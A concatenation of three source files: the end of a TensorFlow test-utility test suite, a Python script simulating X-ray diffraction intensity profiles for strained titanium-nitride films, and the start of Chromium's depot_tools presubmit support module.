self.assertArrayNear(a, b, 0.001)
a = [1, 2]
b = [1, 2]
self.assertArrayNear(a, b, 0.001)
def testForceGPU(self):
with self.assertRaises(errors.InvalidArgumentError):
with self.test_session(force_gpu=True):
# this relies on us not having a GPU implementation for assert, which
# seems sensible
x = constant_op.constant(True)
y = [15]
control_flow_ops.Assert(x, y).run()
def testAssertAllCloseAccordingToType(self):
# test float64
self.assertAllCloseAccordingToType(
np.asarray([1e-8], dtype=np.float64),
np.asarray([2e-8], dtype=np.float64),
rtol=1e-8, atol=1e-8
)
with (self.assertRaises(AssertionError)):
self.assertAllCloseAccordingToType(
np.asarray([1e-7], dtype=np.float64),
np.asarray([2e-7], dtype=np.float64),
rtol=1e-8, atol=1e-8
)
# test float32
self.assertAllCloseAccordingToType(
np.asarray([1e-7], dtype=np.float32),
np.asarray([2e-7], dtype=np.float32),
rtol=1e-8, atol=1e-8,
float_rtol=1e-7, float_atol=1e-7
)
with (self.assertRaises(AssertionError)):
self.assertAllCloseAccordingToType(
np.asarray([1e-6], dtype=np.float32),
np.asarray([2e-6], dtype=np.float32),
rtol=1e-8, atol=1e-8,
float_rtol=1e-7, float_atol=1e-7
)
# test float16
self.assertAllCloseAccordingToType(
np.asarray([1e-4], dtype=np.float16),
np.asarray([2e-4], dtype=np.float16),
rtol=1e-8, atol=1e-8,
float_rtol=1e-7, float_atol=1e-7,
half_rtol=1e-4, half_atol=1e-4
)
with (self.assertRaises(AssertionError)):
self.assertAllCloseAccordingToType(
np.asarray([1e-3], dtype=np.float16),
np.asarray([2e-3], dtype=np.float16),
rtol=1e-8, atol=1e-8,
float_rtol=1e-7, float_atol=1e-7,
half_rtol=1e-4, half_atol=1e-4
)
def testRandomSeed(self):
a = random.randint(1, 1000)
a_np_rand = np.random.rand(1)
with self.test_session():
a_rand = random_ops.random_normal([1]).eval()
# ensure that randomness in multiple testCases is deterministic.
self.setUp()
b = random.randint(1, 1000)
b_np_rand = np.random.rand(1)
with self.test_session():
b_rand = random_ops.random_normal([1]).eval()
self.assertEqual(a, b)
self.assertEqual(a_np_rand, b_np_rand)
self.assertEqual(a_rand, b_rand)
class GarbageCollectionTest(test_util.TensorFlowTestCase):
def test_no_reference_cycle_decorator(self):
class ReferenceCycleTest(object):
def __init__(inner_self): # pylint: disable=no-self-argument
inner_self.assertEqual = self.assertEqual # pylint: disable=invalid-name
@test_util.assert_no_garbage_created
def test_has_cycle(self):
a = []
a.append(a)
@test_util.assert_no_garbage_created
def test_has_no_cycle(self):
pass
with self.assertRaises(AssertionError):
ReferenceCycleTest().test_has_cycle()
ReferenceCycleTest().test_has_no_cycle()
@test_util.with_c_api
class IsolationTest(test_util.TensorFlowTestCase):
@test_util.run_in_graph_and_eager_modes()
def test_variable_reuse_exception(self):
with test_util.IsolateTest(), session.Session():
first_container_variable = resource_variable_ops.ResourceVariable(
name="first_container_variable",
initial_value=1)
if context.in_graph_mode():
self.evaluate([variables.global_variables_initializer()])
with test_util.IsolateTest():
if context.in_graph_mode():
with self.assertRaises(RuntimeError):
self.evaluate(first_container_variable.read_value())
else:
with self.assertRaises(ValueError):
first_container_variable.read_value()
@test_util.run_in_graph_and_eager_modes()
def test_variable_reuse_exception_nested(self):
with test_util.IsolateTest(), session.Session():
first_container_variable = resource_variable_ops.ResourceVariable(
name="first_container_variable",
initial_value=1)
if context.in_graph_mode():
self.evaluate([variables.global_variables_initializer()])
with test_util.IsolateTest(), session.Session():
if context.in_graph_mode():
with self.assertRaises(RuntimeError):
self.evaluate(first_container_variable.read_value())
else:
with self.assertRaises(ValueError):
first_container_variable.read_value()
@test_util.run_in_graph_and_eager_modes()
def test_no_sharing(self):
with test_util.IsolateTest(), session.Session():
first_container_variable = resource_variable_ops.ResourceVariable(
name="same_name",
initial_value=1)
if context.in_graph_mode():
self.evaluate([variables.global_variables_initializer()])
with test_util.IsolateTest(), session.Session():
second_container_variable = resource_variable_ops.ResourceVariable(
name="same_name",
initial_value=2)
if context.in_graph_mode():
self.evaluate([variables.global_variables_initializer()])
self.assertEqual(
2, self.evaluate(second_container_variable.read_value()))
self.assertEqual(1, self.evaluate(first_container_variable.read_value()))
def test_graph_mode_isolation(self):
with context.graph_mode():
# Even if we've (accidentally) called IsolateTest in Graph mode, it should
# provide Eager isolation.
with test_util.IsolateTest():
with context.eager_mode():
first_container_variable = resource_variable_ops.ResourceVariable(
name="first_container_variable",
initial_value=1)
with context.eager_mode():
with self.assertRaises(ValueError):
first_container_variable.read_value()
if __name__ == "__main__":
googletest.main()
|
variable-strained.py
|
import numpy as np
import pandas as pd
from scipy.interpolate import interp1d
import itertools as iter
import threading
import sys
import pathlib
import time
from time import sleep
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKCYAN = '\033[96m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
done = False
def animate():
for c in iter.cycle(["⢿ ", "⣻ ", "⣽ ", "⣾ ", "⣷ ", "⣯ ", "⣟ ", "⡿ "]):
if done:
break
sys.stdout.write(f'{bcolors.BOLD}{bcolors.OKGREEN}\rtask in progress {bcolors.ENDC}' + '%c' % (c))
sys.stdout.flush()
time.sleep(0.1)
sys.stdout.write('\rDone! ')
start_time = time.time()
path_str = str(pathlib.Path(__file__).parent.resolve())
class discr_film:
def __init__(self,
hkl_l ,alpha, depth_f, steps, filename, **kwargs):
# incidence X-Ray angle
self.alpha = alpha
self.hkl_l = np.array(hkl_l)
self.I = 10
# thickness and steps (layer size)
self.y = np.linspace(0, depth_f, steps)
self.steps = steps
self.filename = filename
# Å
self.lamb = 1.540562
self.df = self.a_s()
self.c = self.c_y()
self.a = self.a_()
self.d = self.d_()
self.theta = self.theta_()
self.z_f = self.z_f_()
self.v = self.v_()
self.ro = self.ro_()
self.s_f = self.s_f_()
self.f_Ti = self.f_Ti_()
self.f_N = self.f_N_()
self.f_F = self.f_F_()
self.f_m = self.f_m_()
self.ro_film = self.ro_()
self.I_cor = self.I_exp()
# reading the Ni/Ti and a table
def a_s(self):
df = pd.read_csv(self.filename, sep=";", decimal=',', header=0, dtype={'a':np.float64, 'Ni/Ti':np.float64})
df['a'] = df['a']*10e-3
df['v'] = df['a']**3
return df
def c_y(self):
c = []
for y, i in zip(self.y, range(self.steps)):
c.append(
-0.023031+(0.95743+0.023031)/
(1+np.exp((y-1.54092e-6)/1.81375e-7))
)
return c
def a_(self):
a = []
a_interp = interp1d(self.df['Ni/Ti'].tolist(), self.df['a'].tolist(), fill_value="extrapolate")
for i in range(self.steps):
a.append(
float(a_interp(self.c[i])))
return a
def v_(self):
v = []
for i in range(self.steps):
v.append((self.a[i]*1e-1)**3)
return v
def d_(self):
d = []
for h, k, l in self.hkl_l:
for a in self.a:
d.append((a/np.sqrt(h**2 + k**2 + l**2)))
return d
def theta_(self):
theta = []
for i, d in enumerate(self.d):
theta.append((180/np.pi)*(2 * np.arcsin((self.lamb)/(2 * d))))
return theta
def z_f_(self):
z_f = []
for i in range(self.steps):
z_f.append(
((self.y[i] - self.y[i-1])/(np.sin(np.deg2rad(self.alpha))))
)
if z_f[i] < 0:
z_f[i] = 1e-9
return z_f
# LORENTZ FACTOR
def s_f_(self):
s_f = []
for i, t in enumerate(self.theta):
s_f.append(
(1+np.cos(np.deg2rad(t))**2)/((np.sin(np.deg2rad(t/2))**2)*np.cos(np.deg2rad(t/2)))
)
return s_f
def f_Ti_(self):
f_Ti = []
f_Ti_l = pd.read_csv("atom_scattering/Ti_scat.txt", sep=",", decimal='.', dtype={'theta_lamb':np.float64, 'f':np.float64})
f_Ti_interp = interp1d(f_Ti_l['theta_lamb'].tolist(),f_Ti_l['f'].tolist())
count = 0
for i, t in enumerate(self.theta):
f_Ti.append(
float(f_Ti_interp(np.sin(np.deg2rad(t/2))/self.lamb))
)
# print(t, ' ', f_Ti[count])
count += 1
return f_Ti
def f_N_(self):
f_N = []
f_N_l = pd.read_csv("atom_scattering/N_scat.txt", sep=",", decimal='.', dtype={'theta_lamb':np.float64, 'f':np.float64})
f_N_interp = interp1d(f_N_l['theta_lamb'].tolist(),f_N_l['f'].tolist())
count = 0
for i, t in enumerate(self.theta):
f_N.append(
float(f_N_interp(np.sin(np.deg2rad(t/2))/self.lamb))
)
# print(t, f_N[count])
count += 1
return f_N
# |F|^2 factor
def f_F_(self):
f_F = []
count = 0
local = {}
for ind in self.hkl_l:
h,k,l = ind
local[str(h)+str(k)+str(l)] = pd.read_csv('.\s_factors\output_factor_'+str(h)+str(k)+str(l)+'.txt', sep=" ", decimal='.')
local["interp"+str(h)+str(k)+str(l)] = interp1d(local[str(h)+str(k)+str(l)]['c'].to_list(),
local[str(h)+str(k)+str(l)]['|F|^2'].to_list(), fill_value="extrapolate")
i = 0
for ind in self.hkl_l:
h, k, l = ind
string = str(h)+str(k)+str(l)
# print(h, k, l)
for c in self.c:
f_F.append(float(local["interp"+string](c)))
return f_F
def f_m_(self):
f_m = []
div = int(len(self.theta)/len(self.hkl_l))
for i, (ind, t) in enumerate(zip(self.hkl_l, self.theta)):
h, k, l = ind
for i in iter.repeat(ind, int(self.steps)):
if h != k != l != 0:
f_m.append(48)
if h == k == l:
f_m.append(8)
if h != 0 and k == l == 0:
f_m.append(6)
if h == k and l == 0:
f_m.append(12)
if h == k and l != h and l != 0:
f_m.append(24)
if h != k and k == l and k != 0:
f_m.append(24)
if h != k != l and l == 0:
f_m.append(24)
# print(ind, t)
return f_m
def ro_(self):
ro_film = []
for i, c in enumerate(self.c):
ro_film.append(
(4*(47.867 + c * 14.0067)*1e3)/
(6.022e+23 * (self.a[i]*1e-8)**3)
)
# print(c, ro_film[i])
return ro_film
def I_exp(self):
I_0 = self.I
I = []
I_cor = []
I_exp = []
u_p = []
for i in range(self.steps):
w_fN = (self.c[i] * 14.0067)/(47.867 + (self.c[i]*14.0067)) # weight fraction
u_p.append(
(w_fN * 7.17200E+00) + # Nitrogen cm^2/g
((1. - w_fN) * 1.98790E+02) # Titanium cm^2/g
)
for i in range(self.steps):
if self.y[i]-self.y[i-1] < 0:
I_exp.append(0)
else:
I_exp.append(u_p[i] * 0.1 * self.ro_film[i] * (
((self.y[i] - self.y[i-1])/(np.sin(np.deg2rad(self.alpha)))) +
((self.y[i] - self.y[i-1])/(np.sin(np.deg2rad(self.theta[i] - self.alpha))))
))
for i, exp in enumerate(np.cumsum(I_exp)):
I = I_0 * np.exp(-exp)
I_cor.append(I)
return I_cor
def func_(Iy, theta, w, m, x, **kwargs):
if kwargs['func'] == "Lorentz":
return Iy*((1+(x-theta)**2/w**2))**m
if kwargs['func'] == "Gauss":
return (Iy/(w*np.sqrt(np.pi/2))) * np.exp(-2*(x-theta)**2/(w**2))
def split_func(Iy, theta, w1, w2, m1, m2, x, **kwargs):
if kwargs['func'] == "spltpearVII":
if x < theta:
return Iy * (
(w1**(2*m1))/
(w1**2+(2**(1/m1)-1)*(x-theta)**2)**m1
)
if x >= theta:
return Iy * (
(w2**(2*m2))/
(w2**2+(2**(1/m2)-1)*(x-theta)**2)**m2
)
# class integration:
hkl_l_fcc = [[1,1,1],
[2,0,0],
[2,2,0],
[3,1,1],
[2,2,2],
[4,0,0]]
hkl_l_bcc = [[1,1,0],
[2,0,0],
[2,1,1]]
angles = [3., 5., 7., 10., 12., 15.]
a_dict = {}
rlt_int = [[1.23, 1.67, 0.45, 0.37], #3
[1.2, 1.2, 0.35, 0.43], #5
[1.3, 1.25, 0.37, 0.46], #7
[1.9, 1.16, 0.28, 0.49], #10
[2.62, 1.22, 0.26, 0.39], #12
[3.56, 1.3, 0.23, 0.63]
] #15
# rlt_int = [[1 for i in range(4)] for i in range(6)]
for a in angles:
string = "array_"+str(int(a))
a_dict[string] = discr_film(hkl_l_fcc, a, 2e-6, 100, "comp_crystal/Ti_N.txt")
x_range = np.arange(30, 80, 0.01)
lamb = 0.1540562
e = 0.0108338412572665
D = 13.3021530274522
for i, a in enumerate(angles):
string = "y_"+str(int(a))
string_w = "w_l_"+str(int(a))
a_dict["y_"+str(int(a))] = [[] for i in range(len(a_dict["array_"+str(int(a))].theta))]
a_dict["w_l_"+str(int(a))] = []
for i, t in enumerate(a_dict["array_"+str(int(a))].theta):
b = (lamb+np.sqrt(lamb**2+4*e**2*D**2*np.sin(np.deg2rad(t/2))**2))/(2*D*np.cos(np.deg2rad(t/2)))
a_dict["w_l_"+str(int(a))].append(np.rad2deg(b))
# print(a_dict["w_l_3"])
sch_dict = {}
sch_dict["sch_3"] = [[0.44,1.7875,7.334],
[0.46, 4.5123,3.03985],
[0.43, 4.1224,7.35653],
[0.46, 7.78303,5.61911]]
def strain_func(psi, e_33, e_hkl, d):
return 2*np.rad2deg(
np.arcsin(lamb/(d*(2+e_33+e_hkl+(e_33*np.cos(2*psi))-(e_hkl*np.cos(2*psi)))))
)
def br(x):
x1 = np.deg2rad(x/2)
return np.rad2deg(
((lamb/np.cos(x1))+np.tan(x1)*np.sqrt(4*D**2*e**2+lamb**2/np.sin(x1)**2))/(2*D)
)
print(f"{bcolors.HEADER}--- %s sec to init calculations --- {bcolors.ENDC}" % (time.time() - start_time))
for a in angles:
a_dict["array_"+str(int(a))+"_c_calc"] = np.array(a_dict["array_"+str(int(a))].c)
a_dict["array_"+str(int(a))+"_theta_calc"] = np.array(a_dict["array_"+str(int(a))].theta)
a_dict["array_"+str(int(a))+"_d_calc"] = np.array(a_dict["array_"+str(int(a))].d)
t = threading.Thread(target=animate)
t.start()
for j, a in enumerate(angles):
for i, (c, t, d) in enumerate(zip(iter.cycle(a_dict["array_"+str(int(a))+"_c_calc"]), a_dict["array_"+str(int(a))+"_theta_calc"], iter.cycle(a_dict["array_"+str(int(a))+"_d_calc"]))):
interval = len(a_dict["array_"+str(int(a))].theta)/len(hkl_l_fcc)
temp = np.empty([len(x_range)], float)
psi = np.sin(np.deg2rad(t/2-a))**2
e33 = 0.
for k,x in enumerate(x_range):
if i <= interval: # 111
e_hkl = 0.
t1 = strain_func(psi, e33, e_hkl, d/10)
y = split_func(rlt_int[j][0],t1,sch_dict["sch_3"][0][0]*br(t), br(t)-sch_dict["sch_3"][0][0]*br(t),sch_dict["sch_3"][0][1],sch_dict["sch_3"][0][2],x,func="spltpearVII")/4e4
temp[k] = y
elif interval < i <= 2*interval: # 200
e_hkl = 0.
t1 = strain_func(psi, e33, e_hkl, d/10)
y = split_func(rlt_int[j][1],t1,sch_dict["sch_3"][1][0]*br(t), br(t)-sch_dict["sch_3"][1][0]*br(t),sch_dict["sch_3"][1][1],sch_dict["sch_3"][1][2],x,func="spltpearVII")/4e4
temp[k] = y
elif 2*interval < i <= 3*interval: # 220
e_hkl = -0.
t1 = strain_func(psi, e33, e_hkl, d/10)
y = split_func(rlt_int[j][2],t1,sch_dict["sch_3"][2][0]*br(t), br(t)-sch_dict["sch_3"][2][0]*br(t),sch_dict["sch_3"][2][1],sch_dict["sch_3"][2][2],x,func="spltpearVII")/4e4
temp[k] = y
elif 3*interval < i <= 4*interval: # 311
e_hkl = -0.
t1 = strain_func(psi, e33, e_hkl, d/10)
y = split_func(rlt_int[j][3],t1,sch_dict["sch_3"][3][0]*br(t), br(t)-sch_dict["sch_3"][3][0]*br(t),sch_dict["sch_3"][3][1],sch_dict["sch_3"][3][2],x,func="spltpearVII")/4e4
temp[k] = y
else:
y = split_func(1, t, 0.4, 0.4, 1.1, 1.1, x, func="spltpearVII")/4e4
temp[k] = y
a_dict["y_"+str(int(a))][i] = temp
print(f"{bcolors.HEADER}--- %s seconds for alpha = %a ---{bcolors.ENDC}" % (time.time() - start_time, int(a)))
time.sleep(10)
done = True
print(f"{bcolors.BOLD}--- %s sec to complete --- {bcolors.ENDC}" % (time.time() - start_time))
for a in angles:
with open('data_output/var_strained_'+str(a)+'_intensity.txt', 'w') as f:
for i, (t, x, L, I, F, p) in enumerate(zip(a_dict["array_"+str(int(a))].theta, a_dict["y_"+str(int(a))], a_dict["array_"+str(int(a))].s_f,
iter.cycle(a_dict["array_"+str(int(a))].I_cor), a_dict["array_"+str(int(a))].f_F, a_dict["array_"+str(int(a))].f_m)):
a_dict["y_"+str(int(a))][i] = [y * F * p * L * I for y in x]
print(t, '\t', I, '\t', F,'\t', p, '\n', file = f)
x_label = [r"$2\theta$",
r"depth [$\mu m$]"]
y_label = [r"I [a.u.]",
r"\Large$\frac{\text{N}}{\text{Ti}}$"]
# multipliers = [2.56,1.87,1.61,1.43,1.36,1.32]
multipliers = [1., 1., 1., 1., 1., 1.,]
for a, m in zip(angles, multipliers):
a_dict["y_conv_"+str(int(a))] = [sum(i) * m for i in zip(*a_dict["y_"+str(int(a))])]
# File outputs
for a in angles:
with open('data_output/output_var_strained_'+str(int(a))+'.txt', 'w') as f:
# print("2theta", '\t', "y_conv", "\n",file=f)
for x, y in zip(x_range, a_dict["y_conv_"+str(int(a))]):
print(x,'\t' ,y, file=f)
with open('data_output/output_var_strained_conc.txt', 'w') as f:
# print("2theta", '\t', "y_conv", "\n",file=f)
for x, y in zip(a_dict["array_3"].y, a_dict["array_3"].c):
print(x,'\t' ,y, file=f)
dic = {}
for i,a in enumerate(angles):
dic['df'+str(int(a))] = pd.read_csv('data_output/output_var_strained_'+str(int(a))+'.txt', sep='\t',decimal=",")
finaldf = pd.concat([dic['df3'],dic['df5'],dic['df7'],dic['df10'],dic['df12'],dic['df15']], axis=1, join='inner').sort_index()
finaldf.to_csv('data_output/output_variable_strained_ALL.txt', sep='\t')
print(finaldf)
|
presubmit_support.py
|
#!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Enables directory-specific presubmit checks to run at upload and/or commit.
"""
from __future__ import print_function
__version__ = '1.8.0'
# TODO(joi) Add caching where appropriate/needed. The API is designed to allow
# caching (between all different invocations of presubmit scripts for a given
# change). We should add it as our presubmit scripts start feeling slow.
import ast # Exposed through the API.
import contextlib
import cPickle # Exposed through the API.
import cpplint
import cStringIO # Exposed through the API.
import fnmatch # Exposed through the API.
import glob
import inspect
import itertools
import json # Exposed through the API.
import logging
import marshal # Exposed through the API.
import multiprocessing
import optparse
import os # Somewhat exposed through the API.
import pickle # Exposed through the API.
import random
import re # Exposed through the API.
import signal
import sys # Parts exposed through API.
import tempfile # Exposed through the API.
import threading
import time
import traceback # Exposed through the API.
import types
import unittest # Exposed through the API.
import urllib2 # Exposed through the API.
import urlparse
from warnings import warn
# Local imports.
import fix_encoding
import gclient_paths # Exposed through the API
import gclient_utils
import git_footers
import gerrit_util
import owners
import owners_finder
import presubmit_canned_checks
import scm
import subprocess2 as subprocess # Exposed through the API.
# Ask for feedback only once in program lifetime.
_ASKED_FOR_FEEDBACK = False
class PresubmitFailure(Exception):
pass
class CommandData(object):
def __init__(self, name, cmd, kwargs, message):
self.name = name
self.cmd = cmd
self.stdin = kwargs.get('stdin', None)
self.kwargs = kwargs
self.kwargs['stdout'] = subprocess.PIPE
self.kwargs['stderr'] = subprocess.STDOUT
self.kwargs['stdin'] = subprocess.PIPE
self.message = message
self.info = None
# Adapted from
# https://github.com/google/gtest-parallel/blob/master/gtest_parallel.py#L37
#
# An object that catches SIGINT sent to the Python process and notices
# if processes passed to wait() die by SIGINT (we need to look for
# both of those cases, because pressing Ctrl+C can result in either
# the main process or one of the subprocesses getting the signal).
#
# Before a SIGINT is seen, wait(p) will simply call p.wait() and
# return the result. Once a SIGINT has been seen (in the main process
# or a subprocess, including the one the current call is waiting for),
# wait(p) will call p.terminate() and raise ProcessWasInterrupted.
class SigintHandler(object):
class ProcessWasInterrupted(Exception):
pass
sigint_returncodes = {-signal.SIGINT, # Unix
-1073741510, # Windows
}
def __init__(self):
self.__lock = threading.Lock()
self.__processes = set()
self.__got_sigint = False
signal.signal(signal.SIGINT, lambda signal_num, frame: self.interrupt())
def __on_sigint(self):
self.__got_sigint = True
while self.__processes:
try:
self.__processes.pop().terminate()
except OSError:
pass
def interrupt(self):
with self.__lock:
self.__on_sigint()
def got_sigint(self):
with self.__lock:
return self.__got_sigint
def wait(self, p, stdin):
with self.__lock:
if self.__got_sigint:
p.terminate()
self.__processes.add(p)
stdout, stderr = p.communicate(stdin)
code = p.returncode
with self.__lock:
self.__processes.discard(p)
if code in self.sigint_returncodes:
self.__on_sigint()
if self.__got_sigint:
raise self.ProcessWasInterrupted
return stdout, stderr
sigint_handler = SigintHandler()
class ThreadPool(object):
def __init__(self, pool_size=None):
self._pool_size = pool_size or multiprocessing.cpu_count()
self._messages = []
self._messages_lock = threading.Lock()
self._tests = []
self._tests_lock = threading.Lock()
self._nonparallel_tests = []
def CallCommand(self, test):
"""Runs an external program.
This function converts invocation of .py files and invocations of "python"
to vpython invocations.
"""
vpython = 'vpython.bat' if sys.platform == 'win32' else 'vpython'
cmd = test.cmd
if cmd[0] == 'python':
cmd = list(cmd)
cmd[0] = vpython
elif cmd[0].endswith('.py'):
cmd = [vpython] + cmd
try:
start = time.time()
p = subprocess.Popen(cmd, **test.kwargs)
stdout, _ = sigint_handler.wait(p, test.stdin)
duration = time.time() - start
except OSError as e:
duration = time.time() - start
return test.message(
'%s exec failure (%4.2fs)\n %s' % (test.name, duration, e))
if p.returncode != 0:
return test.message(
'%s (%4.2fs) failed\n%s' % (test.name, duration, stdout))
if test.info:
return test.info('%s (%4.2fs)' % (test.name, duration))
def AddTests(self, tests, parallel=True):
if parallel:
self._tests.extend(tests)
else:
self._nonparallel_tests.extend(tests)
def RunAsync(self):
self._messages = []
def _WorkerFn():
while True:
test = None
with self._tests_lock:
if not self._tests:
break
test = self._tests.pop()
result = self.CallCommand(test)
if result:
with self._messages_lock:
self._messages.append(result)
def _StartDaemon():
t = threading.Thread(target=_WorkerFn)
t.daemon = True
t.start()
return t
while self._nonparallel_tests:
test = self._nonparallel_tests.pop()
result = self.CallCommand(test)
if result:
self._messages.append(result)
if self._tests:
threads = [_StartDaemon() for _ in range(self._pool_size)]
for worker in threads:
worker.join()
return self._messages
def normpath(path):
'''Version of os.path.normpath that also changes backward slashes to
forward slashes when not running on Windows.
'''
# This is safe to always do because the Windows version of os.path.normpath
# will replace forward slashes with backward slashes.
path = path.replace(os.sep, '/')
return os.path.normpath(path)
def _RightHandSideLinesImpl(affected_files):
"""Implements RightHandSideLines for InputApi and GclChange."""
for af in affected_files:
lines = af.ChangedContents()
for line in lines:
yield (af, line[0], line[1])
class PresubmitOutput(object):
def __init__(self, input_stream=None, output_stream=None):
self.input_stream = input_stream
self.output_stream = output_stream
self.reviewers = []
self.more_cc = []
self.written_output = []
self.error_count = 0
def prompt_yes_no(self, prompt_string):
self.write(prompt_string)
if self.input_stream:
response = self.input_stream.readline().strip().lower()
if response not in ('y', 'yes'):
self.fail()
else:
self.fail()
def fail(self):
self.error_count += 1
def should_continue(self):
return not self.error_count
def write(self, s):
self.written_output.append(s)
if self.output_stream:
self.output_stream.write(s)
def getvalue(self):
return ''.join(self.written_output)
# Top level object so multiprocessing can pickle
# Public access through OutputApi object.
class _PresubmitResult(object):
"""Base class for result objects."""
fatal = False
should_prompt = False
def __init__(self, message, items=None, long_text=''):
"""
message: A short one-line message to indicate errors.
items: A list of short strings to indicate where errors occurred.
long_text: multi-line text output, e.g. from another tool
"""
self._message = message
self._items = items or []
self._long_text = long_text.rstrip()
def handle(self, output):
output.write(self._message)
output.write('\n')
for index, item in enumerate(self._items):
output.write(' ')
# Write separately in case it's unicode.
output.write(str(item))
if index < len(self._items) - 1:
output.write(' \\')
output.write('\n')
if self._long_text:
output.write('\n***************\n')
# Write separately in case it's unicode.
output.write(self._long_text)
output.write('\n***************\n')
if self.fatal:
output.fail()
def json_format(self):
return {
'message': self._message,
'items': [str(item) for item in self._items],
'long_text': self._long_text,
'fatal': self.fatal
}
# Top level object so multiprocessing can pickle
# Public access through OutputApi object.
class _PresubmitError(_PresubmitResult):
"""A hard presubmit error."""
fatal = True
# Top level object so multiprocessing can pickle
# Public access through OutputApi object.
class _PresubmitPromptWarning(_PresubmitResult):
"""An warning that prompts the user if they want to continue."""
should_prompt = True
# Top level object so multiprocessing can pickle
# Public access through OutputApi object.
class _PresubmitNotifyResult(_PresubmitResult):
"""Just print something to the screen -- but it's not even a warning."""
pass
# Top level object so multiprocessing can pickle
# Public access through OutputApi object.
class _MailTextResult(_PresubmitResult):
"""A warning that should be included in the review request email."""
def __init__(self, *args, **kwargs):
super(_MailTextResult, self).__init__()
raise NotImplementedError()
class GerritAccessor(object):
"""Limited Gerrit functionality for canned presubmit checks to work.
To avoid excessive Gerrit calls, caches the results.
"""
def __init__(self, host):
self.host = host
self.cache = {}
def _FetchChangeDetail(self, issue):
# Separate function to be easily mocked in tests.
try:
return gerrit_util.GetChangeDetail(
self.host, str(issue),
['ALL_REVISIONS', 'DETAILED_LABELS', 'ALL_COMMITS'])
except gerrit_util.GerritError as e:
if e.http_status == 404:
raise Exception('Either Gerrit issue %s doesn\'t exist, or '
'no credentials to fetch issue details' % issue)
raise
def GetChangeInfo(self, issue):
"""Returns labels and all revisions (patchsets) for this issue.
The result is a dictionary according to Gerrit REST Api.
https://gerrit-review.googlesource.com/Documentation/rest-api.html
However, API isn't very clear what's inside, so see tests for example.
"""
assert issue
cache_key = int(issue)
if cache_key not in self.cache:
self.cache[cache_key] = self._FetchChangeDetail(issue)
return self.cache[cache_key]
def GetChangeDescription(self, issue, patchset=None):
"""If patchset is none, fetches current patchset."""
info = self.GetChangeInfo(issue)
# info is a reference to cache. We'll modify it here adding description to
# it to the right patchset, if it is not yet there.
# Find revision info for the patchset we want.
if patchset is not None:
for rev, rev_info in info['revisions'].iteritems():
if str(rev_info['_number']) == str(patchset):
break
else:
raise Exception('patchset %s doesn\'t exist in issue %s' % (
patchset, issue))
else:
rev = info['current_revision']
rev_info = info['revisions'][rev]
return rev_info['commit']['message']
def GetDestRef(self, issue):
ref = self.GetChangeInfo(issue)['branch']
if not ref.startswith('refs/'):
# NOTE: it is possible to create 'refs/x' branch,
# aka 'refs/heads/refs/x'. However, this is ill-advised.
ref = 'refs/heads/%s' % ref
return ref
def GetChangeOwner(self, issue):
return self.GetChangeInfo(issue)['owner']['email']
def GetChangeReviewers(self, issue, approving_only=True):
changeinfo = self.GetChangeInfo(issue)
if approving_only:
labelinfo = changeinfo.get('labels', {}).get('Code-Review', {})
values = labelinfo.get('values', {}).keys()
try:
max_value = max(int(v) for v in values)
reviewers = [r for r in labelinfo.get('all', [])
if r.get('value', 0) == max_value]
except ValueError: # values is the empty list
reviewers = []
else:
reviewers = changeinfo.get('reviewers', {}).get('REVIEWER', [])
return [r.get('email') for r in reviewers]
class OutputApi(object):
"""An instance of OutputApi gets passed to presubmit scripts so that they
can output various types of results.
"""
PresubmitResult = _PresubmitResult
PresubmitError = _PresubmitError
PresubmitPromptWarning = _PresubmitPromptWarning
PresubmitNotifyResult = _PresubmitNotifyResult
MailTextResult = _MailTextResult
def __init__(self, is_committing):
self.is_committing = is_committing
self.more_cc = []
def AppendCC(self, cc):
"""Appends a user to cc for this change."""
self.more_cc.append(cc)
def PresubmitPromptOrNotify(self, *args, **kwargs):
"""Warn the user when uploading, but only notify if committing."""
if self.is_committing:
return self.PresubmitNotifyResult(*args, **kwargs)
return self.PresubmitPromptWarning(*args, **kwargs)
class InputApi(object):
"""An instance of this object is passed to presubmit scripts so they can
know stuff about the change they're looking at.
"""
# Method could be a function
# pylint: disable=no-self-use
# File extensions that are considered source files from a style guide
# perspective. Don't modify this list from a presubmit script!
#
# Files without an extension aren't included in the list. If you want to
# filter them as source files, add r"(^|.*?[\\\/])[^.]+$" to the white list.
# Note that ALL CAPS files are black listed in DEFAULT_BLACK_LIST below.
DEFAULT_WHITE_LIST = (
# C++ and friends
r".+\.c$", r".+\.cc$", r".+\.cpp$", r".+\.h$", r".+\.m$", r".+\.mm$",
r".+\.inl$", r".+\.asm$", r".+\.hxx$", r".+\.hpp$", r".+\.s$", r".+\.S$",
# Scripts
r".+\.js$", r".+\.py$", r".+\.sh$", r".+\.rb$", r".+\.pl$", r".+\.pm$",
# Other
r".+\.java$", r".+\.mk$", r".+\.am$", r".+\.css$", r".+\.mojom$",
r".+\.fidl$"
)
# Path regexp that should be excluded from being considered containing source
# files. Don't modify this list from a presubmit script!
DEFAULT_BLACK_LIST = (
r"testing_support[\\\/]google_appengine[\\\/].*",
r".*\bexperimental[\\\/].*",
# Exclude third_party/.* but NOT third_party/{WebKit,blink}
# (crbug.com/539768 and crbug.com/836555).
r".*\bthird_party[\\\/](?!(WebKit|blink)[\\\/]).*",
# Output directories (just in case)
r".*\bDebug[\\\/].*",
r".*\bRelease[\\\/].*",
r".*\bxcodebuild[\\\/].*",
r".*\bout[\\\/].*",
# All caps files like README and LICENCE.
r".*\b[A-Z0-9_]{2,}$",
# SCM (can happen in dual SCM configuration). (Slightly over aggressive)
r"(|.*[\\\/])\.git[\\\/].*",
r"(|.*[\\\/])\.svn[\\\/].*",
# There is no point in processing a patch file.
r".+\.diff$",
r".+\.patch$",
)
def __init__(self, change, presubmit_path, is_committing,
verbose, gerrit_obj, dry_run=None, thread_pool=None, parallel=False):
"""Builds an InputApi object.
Args:
change: A presubmit.Change object.
presubmit_path: The path to the presubmit script being processed.
is_committing: True if the change is about to be committed.
gerrit_obj: provides basic Gerrit codereview functionality.
dry_run: if true, some Checks will be skipped.
parallel: if true, all tests reported via input_api.RunTests for all
PRESUBMIT files will be run in parallel.
"""
# Version number of the presubmit_support script.
self.version = [int(x) for x in __version__.split('.')]
self.change = change
self.is_committing = is_committing
self.gerrit = gerrit_obj
self.dry_run = dry_run
self.parallel = parallel
self.thread_pool = thread_pool or ThreadPool()
